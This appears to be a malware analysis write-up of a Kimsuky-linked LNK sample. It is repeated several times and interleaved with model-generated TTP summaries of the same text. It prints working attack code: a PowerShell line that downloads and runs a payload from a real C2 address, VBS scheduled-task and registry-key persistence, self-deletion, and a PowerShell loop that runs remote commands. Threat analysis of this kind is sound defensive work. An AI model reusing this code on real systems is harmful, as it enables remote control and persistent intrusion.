Kimsuky A Gift That Keeps on Giving

ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
Original: All text extracted from PDF

Original Text
lnkparse sample.lnk > lnkparse.json Straight up we see some red flags like mshta.exe and some javascript command line arguements. The mshta.exe is commonly exploited by threat actors for executing malicious scripts via Microsoft HTML Application files. On crafting the payload we get the something like this: The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. 1 2 3 4 5 6 7 8 9 10 11 powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v; sc C:\ProgramData\nt91610 81 The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. Let’s get the ZIP file and see the contents inside it. Zip File The unzipped file contains 3 files R9147.vbs xM568.tmp s.vbs Kimsuky A Gift That Keeps on Giving Introduction Kimsuky - Shadow of Cyber Espionage → A sample was tweeted by our lovable malwrhunterteam with the tags being pointed out to Kimsuky and it was irresitable for us to have a look at it . The TTP do point to Kimsuky or a DPRK based Threat Actor. The initial infection vector is a LNK file which is mostly attributed to them. LNK Parse → Like every sample, we upload to VT to get a basic idea and our sample todays ranks 16/63. The sample is a LNK or a shortcut file in Windows. We can use LNKParser to get the output in JSON format and work with it. s.vbs Let’s have a look at s.vbs since it’s executed first. → The variable iko9 stores the encoded payload and it’s decoded using a simple for loop employing a Caeser Cipher. It decodes the variable using a simple character shifting (chr(ce8- (4)))). Once it’s decoded , it executes kouahpwya. We can write a python script to decode. 1 2 3 4 5 6 7 8 payload = "big big payload" decoded = "" for char in payload_2: decoded +=chr(ord(char) - 4) print(decoded) Let’s look at the VB script in parts since it’s a bit long. 1 2 3 4 5 6 7 8 9 10 11 12 msnc = "om is the hosted versi" lopppc = "munity and frequent updates: Wo" On Error Resume Next ' ' Garbage text to avoid static detection mkc = "Scr" + "ipt." '"Script." string smocv = "Set monce = W" bothec = smocv + mkc + "CreateObj" jsm = bothec + "ect(""WS" + "cript.Shell""):" Execute jsm ' Execute the command to create the WScript.Shell object → The script begins by setting up a WScript.Shell object, which is a key component for running system commands. By concatenating various string segments to build up the object name, the script evades basic detection techniques. Once assembled, it executes the command to create this object, allowing it to interact with the system shell later in the code. 1 2 3 cl = "cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr ""wscript //e:vbscript //b C:\ \ProgramData\07578.tmp"" /f" monce.Run cl, 0, false → This section of the script creates a scheduled task disguised as an Edge browser update. The task runs every minute, executing a hidden VBS script located at C:\ProgramData\07578.tmp. The purpose of this task is to maintain persistence. 1 2 3 4 5 6 7 8 dc = "c:\programdata\DOC578309.docx" Set fso = CreateObject("Scripting.Filesystemobject") Set fp = fso.OpenTextFile(dc, 2, True) fp.Write "" fp.Close Set opsce = CreateObject("Shell.Application") jsm = "opsce.ShellExecute dc:" Execute jsm → In this step, an empty DOC file is created in the ProgramData folder, and the script proceeds to open it using the ShellExecute function. This serves as a decoy or distraction while the actual code is being ran. This is a wonderful technique. 1 2 3 4 5 6 7 8 kic1 = "ws\system32\wscript.exe //" + "b //e:vbscript C:\ProgramData\R9147.vbs"" /f" qoc = "dows\CurrentVersion\Run"" /v Winload /t REG_SZ /d ""c:\windo" + kic1 tmp2 = "KCU\Software\Microsoft\Win" + qoc untiy = "cmd /c r" tmp1 = "eg add ""H" tmp3 = tmp1 + tmp2 trn1 = untiy + tmp3 monce.Run trn1, 0, false → This part modifies the Windows registry to ensure that a malicious script (R9147.vbs) will be executed every time the system starts. The registry entry is added under the Run key, which is a known technique used by malware to maintain persistence on the victim’s machine. 1 2 untiy = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp';$d = Get- Content $fn; Invoke-Expression $d;" monce.Run untiy, 0, false → In this section, a PowerShell command is executed to read and run the contents of a file (C: \ProgramData\xM578.tmp). 1 2 3 4 5 6 7 s1 = "WS" + "cri" s2 = "pt.Sleep(2000):Se" s3 = "ct = CreateOb" s4 = "DeleteFile" str1 = s1 + "pt.Sle" + s2 + "t tyhun" + s3 + "ject(""Scripting.FileSystemObject""):tyhunct." + s4 + "(""C:\ProgramData\s.vbs""):" Execute str1 → After executing , the script pauses for two seconds and then deletes itself (C: \ProgramData\s.vbs). This cleanup process is designed to remove traces of the script from the system to avoid detection and analysis by security tools. However, the malicious tasks and registry entries remain active. R9147.vbs This script is also obfuscated similarly like the previous one and uses the same decoding routine of Ceaser Cipher. We can use the same python script to get the decoded file. After clearing some garbage text. The final payload we’re left with is 1 2 3 4 5 6 7 8 On Error Resume Next ' Create a WScript Shell object Set sh = WScript.CreateObject("WScript.Shell") ' Execute the contents of a file xM578.tmp bewcdf = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp'; $d = Get-Content $fn; Invoke-Expression $d;" ' Run the PowerShell (with the window hidden) sh.Run bewcdf, 0, false → This script sets up a PowerShell command to execute a hidden payload stored in xM578.tmp. The use of decoy strings and obfuscation techniques makes the script harder to analyze. Let’s analyse the next phase. xM578.tmp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $unmcnex = "64.49.14.181" $yutbbc = "7032" function MuTxdonewd { param( [parameter(Mandatory = $true)][string] $sefncevID ) try { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID if (-not $Musnciuhwefx.WaitOne(2000)) { Exit; } return $Musnciuhwefx } catch [System.Threading.AbandonedMutexException] { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID return MuTxdonewd -sefncevID $sefncevID 28 29 30 } } $Musnciuhwefx = MuTxdonewd -sefncevID 'ScR38294' → This function defines a mutex, which is a synchronization object to ensure that only one instance of the script or malware is running at a time. The Mutex ensures that if the script is already running, a new instance of it cannot be initiated. If an existing instance is found, the script will exit. The script calls the mutex function MuTxdonewd with a specific ID (ScR38294) 1 2 3 4 5 6 7 8 while($true) { $tcpConnection = New-Object System.Net.Sockets.TcpClient($unmcnex, $yutbbc) $tcpStream = $tcpConnection.GetStream() $reader = New-Object System.IO.StreamReader($tcpStream) $writer = New-Object System.IO.StreamWriter($tcpStream) $writer.AutoFlush = $true → The script creates a TCP connection to the C2 server on port 7032. It continuously reads input from the C2 server using the $reader and sends output using the $writer. 1 2 3 4 5 6 7 8 9 10 11 12 $cmd = $reader.ReadLine() if($cmd.Length -ne 0) { $tmpz = "c:\programdata\tmps2.ps1" $cmd \| Out-File $tmpz powershell -ep bypass -f $tmpz; del $tmpz; } Sleep(20); } → The script reads commands from C2 server and the commands are written to a temporary file(tmps2.ps1). The command is later on executed through powershell. Like earlier cleanup of the temporary file is done. The script listens for new commands every 20 seconds. Not The End → From the moment I first encountered Kimsuky APT, I was intrigued by their operations. Their tactics, techniques, and persistence had always fascinated me, but I never had the chance to interact directly with them. However, this time was different. For the first time, they acknowledged my presence with a simple yet telling message from their side. It was a subtle but clear sign that the conversation had finally begun… But before that let’s see what happens when we run the script in our VM in order to verify our findings. On running the sample we can check the registry keys inside HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winload. This key was used for persistence in one of the VBS scripts to register a task that runs the .vbs file at startup These were the files that were dropped, verifying our findings. Last but not the least - Like the nutjob I am, I left my VM connected to internet for 13 hours anticipating that maybe we see a reply from the C2 server. Remember that the response from C2 server will be written in a file called tmps2.ps1. I changed the code a bit to prevent it from auto deleting after getting the response. And there it was after roughly 6 hours of running the initial sample, the file was dropped and there it was the reply I was always hankering for. What did they send ? ▸ Click to reveal spoiler Yes this is the command I received from the C2 but unfortunately nothing further was received. Soon it was silence, the connection fizzled out, leaving nothing more than traces of digital dust and that one lingering message. And just like that, the window into their world closed. Was it a taunt? A sign of respect? Or merely an oversight from an ever-watchful adversary? I’ll never know. Overview → The sample we’ve analyzed here fits perfectly into the broader pattern of cyber attacks attributed to the Kimsuky APT group, a known North Korean-linked threat actor. From the use of LNK files as an initial infection vector to the deployment of VBS scripts for persistence and communication with a remote C2 server, the techniques align with past campaigns orchestrated by this group. → In this case, we observe a well-crafted attack that leverages stealth and obfuscation techniques, including Base64 encoding, Caesar Cipher obfuscation, and the use of scheduled tasks and registry keys to maintain persistence on the victim’s machine. The clear attention to detail in avoiding static detection, such as splitting command strings, shows the group’s sophistication. → The communication to the C2 server and the ultimate payload execution leave no doubt that this campaign is aimed at gaining persistent access to the victim’s machine for extended periods, likely to exfiltrate information or manipulate systems in espionage-related activities. Let’s hope next time malwrhunterteam tags us when something like this comes <3. IOC 1 2 3 4 5 6 7 8 Upbit_20240916.docx.lnk MD5 37fb639a295daa760c739bc21c553406 SHA-1 50e4d8a112e4aad2c984d22f83c80c8723f232da SHA-256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

Original Text

lnkparse sample.lnk > lnkparse.json Straight up we see some red flags like mshta.exe and some javascript command line arguements. The mshta.exe is commonly exploited by threat actors for executing malicious scripts via Microsoft HTML Application files. On crafting the payload we get the something like this: The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. 1 2 3 4 5 6 7 8 9 10 11 powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v; sc C:\ProgramData\nt91610 81 The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. Let’s get the ZIP file and see the contents inside it. Zip File The unzipped file contains 3 files R9147.vbs xM568.tmp s.vbs Kimsuky A Gift That Keeps on Giving Introduction Kimsuky - Shadow of Cyber Espionage → A sample was tweeted by our lovable malwrhunterteam with the tags being pointed out to Kimsuky and it was irresitable for us to have a look at it . The TTP do point to Kimsuky or a DPRK based Threat Actor. The initial infection vector is a LNK file which is mostly attributed to them. LNK Parse → Like every sample, we upload to VT to get a basic idea and our sample todays ranks 16/63. The sample is a LNK or a shortcut file in Windows. We can use LNKParser to get the output in JSON format and work with it. s.vbs Let’s have a look at s.vbs since it’s executed first. → The variable iko9 stores the encoded payload and it’s decoded using a simple for loop employing a Caeser Cipher. It decodes the variable using a simple character shifting (chr(ce8- (4)))). Once it’s decoded , it executes kouahpwya. We can write a python script to decode. 1 2 3 4 5 6 7 8 payload = "big big payload" decoded = "" for char in payload_2: decoded +=chr(ord(char) - 4) print(decoded) Let’s look at the VB script in parts since it’s a bit long. 1 2 3 4 5 6 7 8 9 10 11 12 msnc = "om is the hosted versi" lopppc = "munity and frequent updates: Wo" On Error Resume Next ' ' Garbage text to avoid static detection mkc = "Scr" + "ipt." '"Script." string smocv = "Set monce = W" bothec = smocv + mkc + "CreateObj" jsm = bothec + "ect(""WS" + "cript.Shell""):" Execute jsm ' Execute the command to create the WScript.Shell object → The script begins by setting up a WScript.Shell object, which is a key component for running system commands. By concatenating various string segments to build up the object name, the script evades basic detection techniques. Once assembled, it executes the command to create this object, allowing it to interact with the system shell later in the code. 1 2 3 cl = "cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr ""wscript //e:vbscript //b C:\ \ProgramData\07578.tmp"" /f" monce.Run cl, 0, false → This section of the script creates a scheduled task disguised as an Edge browser update. The task runs every minute, executing a hidden VBS script located at C:\ProgramData\07578.tmp. The purpose of this task is to maintain persistence. 1 2 3 4 5 6 7 8 dc = "c:\programdata\DOC578309.docx" Set fso = CreateObject("Scripting.Filesystemobject") Set fp = fso.OpenTextFile(dc, 2, True) fp.Write "" fp.Close Set opsce = CreateObject("Shell.Application") jsm = "opsce.ShellExecute dc:" Execute jsm → In this step, an empty DOC file is created in the ProgramData folder, and the script proceeds to open it using the ShellExecute function. This serves as a decoy or distraction while the actual code is being ran. This is a wonderful technique. 1 2 3 4 5 6 7 8 kic1 = "ws\system32\wscript.exe //" + "b //e:vbscript C:\ProgramData\R9147.vbs"" /f" qoc = "dows\CurrentVersion\Run"" /v Winload /t REG_SZ /d ""c:\windo" + kic1 tmp2 = "KCU\Software\Microsoft\Win" + qoc untiy = "cmd /c r" tmp1 = "eg add ""H" tmp3 = tmp1 + tmp2 trn1 = untiy + tmp3 monce.Run trn1, 0, false → This part modifies the Windows registry to ensure that a malicious script (R9147.vbs) will be executed every time the system starts. The registry entry is added under the Run key, which is a known technique used by malware to maintain persistence on the victim’s machine. 1 2 untiy = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp';$d = Get- Content $fn; Invoke-Expression $d;" monce.Run untiy, 0, false → In this section, a PowerShell command is executed to read and run the contents of a file (C: \ProgramData\xM578.tmp). 1 2 3 4 5 6 7 s1 = "WS" + "cri" s2 = "pt.Sleep(2000):Se" s3 = "ct = CreateOb" s4 = "DeleteFile" str1 = s1 + "pt.Sle" + s2 + "t tyhun" + s3 + "ject(""Scripting.FileSystemObject""):tyhunct." + s4 + "(""C:\ProgramData\s.vbs""):" Execute str1 → After executing , the script pauses for two seconds and then deletes itself (C: \ProgramData\s.vbs). This cleanup process is designed to remove traces of the script from the system to avoid detection and analysis by security tools. However, the malicious tasks and registry entries remain active. R9147.vbs This script is also obfuscated similarly like the previous one and uses the same decoding routine of Ceaser Cipher. We can use the same python script to get the decoded file. After clearing some garbage text. The final payload we’re left with is 1 2 3 4 5 6 7 8 On Error Resume Next ' Create a WScript Shell object Set sh = WScript.CreateObject("WScript.Shell") ' Execute the contents of a file xM578.tmp bewcdf = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp'; $d = Get-Content $fn; Invoke-Expression $d;" ' Run the PowerShell (with the window hidden) sh.Run bewcdf, 0, false → This script sets up a PowerShell command to execute a hidden payload stored in xM578.tmp. The use of decoy strings and obfuscation techniques makes the script harder to analyze. Let’s analyse the next phase. xM578.tmp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $unmcnex = "64.49.14.181" $yutbbc = "7032" function MuTxdonewd { param( [parameter(Mandatory = $true)][string] $sefncevID ) try { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID if (-not $Musnciuhwefx.WaitOne(2000)) { Exit; } return $Musnciuhwefx } catch [System.Threading.AbandonedMutexException] { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID return MuTxdonewd -sefncevID $sefncevID 28 29 30 } } $Musnciuhwefx = MuTxdonewd -sefncevID 'ScR38294' → This function defines a mutex, which is a synchronization object to ensure that only one instance of the script or malware is running at a time. The Mutex ensures that if the script is already running, a new instance of it cannot be initiated. If an existing instance is found, the script will exit. The script calls the mutex function MuTxdonewd with a specific ID (ScR38294) 1 2 3 4 5 6 7 8 while($true) {
$tcpConnection = New-Object System.Net.Sockets.TcpClient($unmcnex, $yutbbc) $tcpStream = $tcpConnection.GetStream() $reader = New-Object System.IO.StreamReader($tcpStream) $writer = New-Object System.IO.StreamWriter($tcpStream) $writer.AutoFlush = $true → The script creates a TCP connection to the C2 server on port 7032. It continuously reads input from the C2 server using the $reader and sends output using the $writer. 1 2 3 4 5 6 7 8 9 10 11 12 $cmd = $reader.ReadLine() if($cmd.Length -ne 0) { $tmpz = "c:\programdata\tmps2.ps1" $cmd | Out-File $tmpz

powershell -ep bypass -f $tmpz; del $tmpz; } Sleep(20); } → The script reads commands from C2 server and the commands are written to a temporary file(tmps2.ps1). The command is later on executed through powershell. Like earlier cleanup of the temporary file is done. The script listens for new commands every 20 seconds. Not The End → From the moment I first encountered Kimsuky APT, I was intrigued by their operations. Their tactics, techniques, and persistence had always fascinated me, but I never had the chance to interact directly with them. However, this time was different. For the first time, they acknowledged my presence with a simple yet telling message from their side. It was a subtle but clear sign that the conversation had finally begun… But before that let’s see what happens when we run the script in our VM in order to verify our findings. On running the sample we can check the registry keys inside HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winload. This key was used for persistence in one of the VBS scripts to register a task that runs the .vbs file at startup These were the files that were dropped, verifying our findings. Last but not the least - Like the nutjob I am, I left my VM connected to internet for 13 hours anticipating that maybe we see a reply from the C2 server. Remember that the response from C2 server will be written in a file called tmps2.ps1. I changed the code a bit to prevent it from auto deleting after getting the response. And there it was after roughly 6 hours of running the initial sample, the file was dropped and there it was the reply I was always hankering for. What did they send ? ▸ Click to reveal spoiler Yes this is the command I received from the C2 but unfortunately nothing further was received. Soon it was silence, the connection fizzled out, leaving nothing more than traces of digital dust and that one lingering message. And just like that, the window into their world closed. Was it a taunt? A sign of respect? Or merely an oversight from an ever-watchful adversary? I’ll never know. Overview → The sample we’ve analyzed here fits perfectly into the broader pattern of cyber attacks attributed to the Kimsuky APT group, a known North Korean-linked threat actor. From the use of LNK files as an initial infection vector to the deployment of VBS scripts for persistence and communication with a remote C2 server, the techniques align with past campaigns orchestrated by this group. → In this case, we observe a well-crafted attack that leverages stealth and obfuscation techniques, including Base64 encoding, Caesar Cipher obfuscation, and the use of scheduled tasks and registry keys to maintain persistence on the victim’s machine. The clear attention to detail in avoiding static detection, such as splitting command strings, shows the group’s sophistication. → The communication to the C2 server and the ultimate payload execution leave no doubt that this campaign is aimed at gaining persistent access to the victim’s machine for extended periods, likely to exfiltrate information or manipulate systems in espionage-related activities. Let’s hope next time malwrhunterteam tags us when something like this comes <3. IOC 1 2 3 4 5 6 7 8 Upbit_20240916.docx.lnk MD5 37fb639a295daa760c739bc21c553406 SHA-1 50e4d8a112e4aad2c984d22f83c80c8723f232da SHA-256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229

Original Text	ChatGPT 4o Paged
lnkparse sample.lnk > lnkparse.json Straight up we see some red flags like mshta.exe and some javascript command line arguements. The mshta.exe is commonly exploited by threat actors for executing malicious scripts via Microsoft HTML Application files. On crafting the payload we get the something like this: The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. 1 2 3 4 5 6 7 8 9 10 11 powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v; sc C:\ProgramData\nt91610 81 The server (64.49.14.181) is sending a Base64-encoded payload, which is decoded and saved as a ZIP file (t.zip). Once downloaded, the ZIP file is extracted, and the s.vbs script is executed. Let’s get the ZIP file and see the contents inside it. Zip File The unzipped file contains 3 files R9147.vbs xM568.tmp s.vbs	Phase: Execution Technique: mshta.exe Execution Procedure: The attacker uses `mshta.exe` to execute malicious scripts via Microsoft HTML Application files. Phase: Command and Control Technique: PowerShell with TCP Client Command: `shell powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v;` Phase: File Decryption and Execution Technique: Expand-Archive and VBS Execution Procedure: Decode Base64 payload and save as `t.zip`. Extract `t.zip` to `C:\ProgramData` location. Delete the ZIP file. Execute the extracted `s.vbs` script. Phase: Persistence (Inference) Technique: Potential VBS Script for Tasks Files Extracted: `R9147.vbs` `xM568.tmp` `s.vbs` (Please note, the exact method for persistence is not explicitly stated, but the presence of scripts like `s.vbs` might indicate persistent mechanisms using scheduled tasks or startup entries.)
Kimsuky A Gift That Keeps on Giving Introduction Kimsuky - Shadow of Cyber Espionage → A sample was tweeted by our lovable malwrhunterteam with the tags being pointed out to Kimsuky and it was irresitable for us to have a look at it . The TTP do point to Kimsuky or a DPRK based Threat Actor. The initial infection vector is a LNK file which is mostly attributed to them. LNK Parse → Like every sample, we upload to VT to get a basic idea and our sample todays ranks 16/63. The sample is a LNK or a shortcut file in Windows. We can use LNKParser to get the output in JSON format and work with it.	Phase: Initial Access Technique: Malicious LNK File Procedure: The threat actor uses a malicious LNK (shortcut) file to initiate the attack. The LNK file is typically analyzed using tools like LNKParser for further inspection. Phase: Execution Technique: Execution via Malicious LNK Inference of Likely Procedure: Upon interaction, the LNK file likely uses Windows utilities to execute a script or payload. Potential commands could involve `cmd.exe` or `powershell.exe` to execute a staged payload further. Considering the absence of additional specifics in the initial excerpt, further details would depend upon examination of subsequent behaviors described in the full CTI report.
s.vbs Let’s have a look at s.vbs since it’s executed first. → The variable iko9 stores the encoded payload and it’s decoded using a simple for loop employing a Caeser Cipher. It decodes the variable using a simple character shifting (chr(ce8- (4)))). Once it’s decoded , it executes kouahpwya. We can write a python script to decode. 1 2 3 4 5 6 7 8 payload = "big big payload" decoded = "" for char in payload_2: decoded +=chr(ord(char) - 4) print(decoded) Let’s look at the VB script in parts since it’s a bit long. 1 2 3 4 5 6 7 8 9 10 11 12 msnc = "om is the hosted versi" lopppc = "munity and frequent updates: Wo" On Error Resume Next ' ' Garbage text to avoid static detection mkc = "Scr" + "ipt." '"Script." string smocv = "Set monce = W" bothec = smocv + mkc + "CreateObj" jsm = bothec + "ect(""WS" + "cript.Shell""):" Execute jsm ' Execute the command to create the WScript.Shell object → The script begins by setting up a WScript.Shell object, which is a key component for running system commands. By concatenating various string segments to build up the object name, the script evades basic detection techniques. Once assembled, it executes the command to create this object, allowing it to interact with the system shell later in the code. 1 2 3 cl = "cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr ""wscript //e:vbscript //b C:\ \ProgramData\07578.tmp"" /f" monce.Run cl, 0, false	Phase: Execution Technique: VBScript Execution Procedure: A VBScript (`s.vbs`) uses a Caesar Cipher to decode an encoded payload and then executes it. The script concatenates string segments to evade static detection and creates a `WScript.Shell` object to interact with the system shell. Phase: Persistence Technique: Scheduled Task Creation Command: `shell cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr "wscript //e:vbscript //b C:\\ProgramData\\07578.tmp" /f` Description: The script sets up a scheduled task to execute every minute to maintain persistence on the system.
→ This section of the script creates a scheduled task disguised as an Edge browser update. The task runs every minute, executing a hidden VBS script located at C:\ProgramData\07578.tmp. The purpose of this task is to maintain persistence. 1 2 3 4 5 6 7 8 dc = "c:\programdata\DOC578309.docx" Set fso = CreateObject("Scripting.Filesystemobject") Set fp = fso.OpenTextFile(dc, 2, True) fp.Write "" fp.Close Set opsce = CreateObject("Shell.Application") jsm = "opsce.ShellExecute dc:" Execute jsm → In this step, an empty DOC file is created in the ProgramData folder, and the script proceeds to open it using the ShellExecute function. This serves as a decoy or distraction while the actual code is being ran. This is a wonderful technique. 1 2 3 4 5 6 7 8 kic1 = "ws\system32\wscript.exe //" + "b //e:vbscript C:\ProgramData\R9147.vbs"" /f" qoc = "dows\CurrentVersion\Run"" /v Winload /t REG_SZ /d ""c:\windo" + kic1 tmp2 = "KCU\Software\Microsoft\Win" + qoc untiy = "cmd /c r" tmp1 = "eg add ""H" tmp3 = tmp1 + tmp2 trn1 = untiy + tmp3 monce.Run trn1, 0, false → This part modifies the Windows registry to ensure that a malicious script (R9147.vbs) will be executed every time the system starts. The registry entry is added under the Run key, which is a known technique used by malware to maintain persistence on the victim’s machine. 1 2 untiy = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp';$d = Get- Content $fn; Invoke-Expression $d;" monce.Run untiy, 0, false → In this section, a PowerShell command is executed to read and run the contents of a file (C: \ProgramData\xM578.tmp). 1 2 3 4 5 6 7 s1 = "WS" + "cri" s2 = "pt.Sleep(2000):Se" s3 = "ct = CreateOb" s4 = "DeleteFile" str1 = s1 + "pt.Sle" + s2 + "t tyhun" + s3 + "ject(""Scripting.FileSystemObject""):tyhunct." + s4 + "(""C:\ProgramData\s.vbs""):" Execute str1 → After executing , the script pauses for two seconds and then deletes itself (C: \ProgramData\s.vbs). This cleanup process is designed to remove traces of the script from the system to avoid detection and analysis by security tools. However, the malicious tasks and registry	Phase: Persistence Technique: Scheduled Task Procedure: A scheduled task is created to disguise as an Edge browser update, running a hidden VBS script located at `C:\ProgramData\07578.tmp` every minute. Technique: Registry Run Key Command: `cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d "c:\windows\system32\wscript.exe //b //e:vbscript C:\ProgramData\R9147.vbs" /f` Purpose: Ensures the VBS script (R9147.vbs) executes on every system start to maintain persistence. Phase: Execution Technique: VBS Execution Command: `wscript.exe //b //e:vbscript C:\ProgramData\R9147.vbs` Purpose: Executes the malicious VBS script. Technique: PowerShell Execution Command: `powershell -ep bypass -command $fn='C:\\ProgramData\\xM578.tmp';$d = Get-Content $fn; Invoke-Expression $d;` Purpose: Reads and executes the contents of the file `C:\ProgramData\xM578.tmp`. Phase: Defense Evasion Technique: Self-Deletion Command: `WScript.Sleep(2000):Set tyhunct=CreateObject("Scripting.FileSystemObject"):tyhunct.DeleteFile("C:\\ProgramData\\s.vbs")` Purpose: Deletes the script `C:\ProgramData\s.vbs` after execution to remove traces and avoid detection. Phase: Execution (Distraction) Technique: ShellExecute Command: ShellExecute to open a DOC file Purpose: Creates and opens an empty DOC file as a decoy to distract while malicious tasks are performed.
entries remain active. R9147.vbs This script is also obfuscated similarly like the previous one and uses the same decoding routine of Ceaser Cipher. We can use the same python script to get the decoded file. After clearing some garbage text. The final payload we’re left with is 1 2 3 4 5 6 7 8 On Error Resume Next ' Create a WScript Shell object Set sh = WScript.CreateObject("WScript.Shell") ' Execute the contents of a file xM578.tmp bewcdf = "powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp'; $d = Get-Content $fn; Invoke-Expression $d;" ' Run the PowerShell (with the window hidden) sh.Run bewcdf, 0, false → This script sets up a PowerShell command to execute a hidden payload stored in xM578.tmp. The use of decoy strings and obfuscation techniques makes the script harder to analyze. Let’s analyse the next phase. xM578.tmp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $unmcnex = "64.49.14.181" $yutbbc = "7032" function MuTxdonewd { param( [parameter(Mandatory = $true)][string] $sefncevID ) try { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID if (-not $Musnciuhwefx.WaitOne(2000)) { Exit; } return $Musnciuhwefx } catch [System.Threading.AbandonedMutexException] { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID return MuTxdonewd -sefncevID $sefncevID	Phase: Execution Technique: Obfuscated Script Execution via Windows Script Host Procedure: The threat actor uses a VBS script (R9147.vbs) to execute a PowerShell payload. Command: `vbscript On Error Resume Next Set sh = WScript.CreateObject("WScript.Shell") bewcdf = "powershell -ep bypass -command $fn='C:\\ProgramData\\xM578.tmp'; $d = Get-Content $fn; Invoke-Expression $d;" sh.Run bewcdf, 0, false` Phase: Execution Technique: PowerShell Command Execution Command: `powershell powershell -ep bypass -command $fn='C:\\ProgramData\\xM578.tmp'; $d = Get-Content $fn; Invoke-Expression $d;` Phase: Defense Evasion Technique: Obfuscation via Decoy Strings Procedure: Use of obfuscation and decoy strings in scripts to avoid detection and analysis. Phase: Persistence Technique: Mutex Creation for Execution Control Procedure: `powershell function MuTxdonewd { param( [parameter(Mandatory = $true)][string] $sefncevID ) try { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID if (-not $Musnciuhwefx.WaitOne(2000)) { Exit; } return $Musnciuhwefx } catch [System.Threading.AbandonedMutexException] { $Musnciuhwefx = New-Object System.Threading.Mutex -ArgumentList 'false', $sefncevID return MuTxdonewd -sefncevID $sefncevID } }` These techniques represent the tactics and procedures employed by the threat actor in the execution and persistence phases, utilizing obfuscation and control mechanisms to avoid detection.
